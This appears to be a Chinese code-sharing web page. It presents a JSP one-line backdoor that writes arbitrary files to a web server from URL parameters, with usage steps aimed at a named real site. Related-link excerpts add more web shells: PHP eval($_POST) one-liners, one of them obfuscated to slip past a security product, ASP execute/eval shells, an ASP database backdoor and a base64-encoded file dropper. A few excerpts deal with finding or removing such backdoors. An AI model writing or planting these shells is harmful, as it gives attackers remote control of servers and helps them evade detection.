JSP一句话后门
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld
然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 HelloWorld
相关推荐
-
JSP一句话后门
<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> 使用方法: 提交url! jsp?f=1.txt" targ
-
整理的比较全的一句话后门代码(方面大家查找后门)
最近一句话后门不断升级大家注意防范,基本上多事字符替换 过护卫神PHP一句话作者:小东 复制代码 代码如下: <?php $a = str_replace(x,"","axsxxsxexrxxt"); $a($_POST["c"]); ?> 测试成功,主要对付护卫神,其他的也可以试试 dedecms5.7一句话后门 @eval(file_get_contents('php://input')); asp一句话木马 程序代码 <%
-
JSP一句话木马代码
复制代码 代码如下: <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> 这个 后门估计不用我说了吧.还是提示一下咯.保
-
用php实现批量查询清除一句话后门的代码
总是忘记一句话放到哪个文件里去了,直接全部干掉... 复制代码 代码如下: <?//xy7 if (!isset($dir) or empty($dir)) { $dir=str_replace('\\','/',dirname(__FILE__)); echo "<font color=\"#00688B\">".$dir."</font>"; } else { $dir=$_GET['dir']; e
-
慎用preg_replace危险的/e修饰符(一句话后门常用)
preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后).提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误
-
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
今天一个客户的服务器频繁被写入: mm.php 内容为: 复制代码 代码如下: <?eval($_POST[c]);?> 最后查到某文件内的第一行为以下代码: 复制代码 代码如下: fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=")); base64_decode("bW0ucGhw") /
-
各种一句话木马大全
<%eval request("c")%> <%execute request("c")%> <%execute(request("c"))%> <%ExecuteGlobal request("sb")%> %><%Eval(Request(chr(35)))%><% <%if request ("c")<>&quo
-
几种另类的ASP后门
<% 'code by netpatch dim dbfile,sql db="netpatch.asp" dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog") ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile set ydb=nothing if er
-
新型ASP后门源代码分析
本是为了逃LAKER2兄 查ASP木马程序的 现在已经挑战成功,已经加为检查对象了.公布出代码给冰点的朋友使使,希望大家喜欢! 利用的是ADOX.Catalog组件 复制代码 代码如下: <% 'code by netpatch dim dbfile,sql db="netpatch.asp" dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog")
-
教你识别简单的免查杀PHP后门
一个最常见的一句话后门可能写作这样 <?php @eval($_POST['cmd']);?> 或这样 <?php @assert($_POST['cmd']);?> tudouya 同学在FREEBUF上给出[一种构造技巧]利用 复制代码 代码如下: <?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _
随机推荐
- MAC下MYSQL5.7.17连接不上的问题及解决办法
- 基于JavaScript实现跳转提示页面
- SQL Server 2005 中做全文检索的方法分享
- android针对json数据解析方法实例分析
- Windows下病毒木马基本防御和解决方案
- 匹配价格的正则表达式
- classloader类加载器_基于java类的加载方式详解
- IOS MenuViewController实现弹出菜单效果
- iOS用两行代码完美解决数据持久化
- php将HTML表格每行每列转为数组实现采集表格数据的方法
- Android判断软键盘的状态和隐藏软键盘的简单实例
- 分享一个Android设置圆形图片的特别方法
- 获取body标签的两种方法
- JQuery获取当前屏幕的高度宽度的实现代码
- asp.net中oracle 存储过程(图文)
- JS中for循序中延迟加载动态效果的具体实现
- flash as2.0组件样式修改方法(直接改元件就行喽)
- NTFS还是FAT
- C++实现的归并排序算法详解
- webstorm和.vue中es6语法报错的解决方法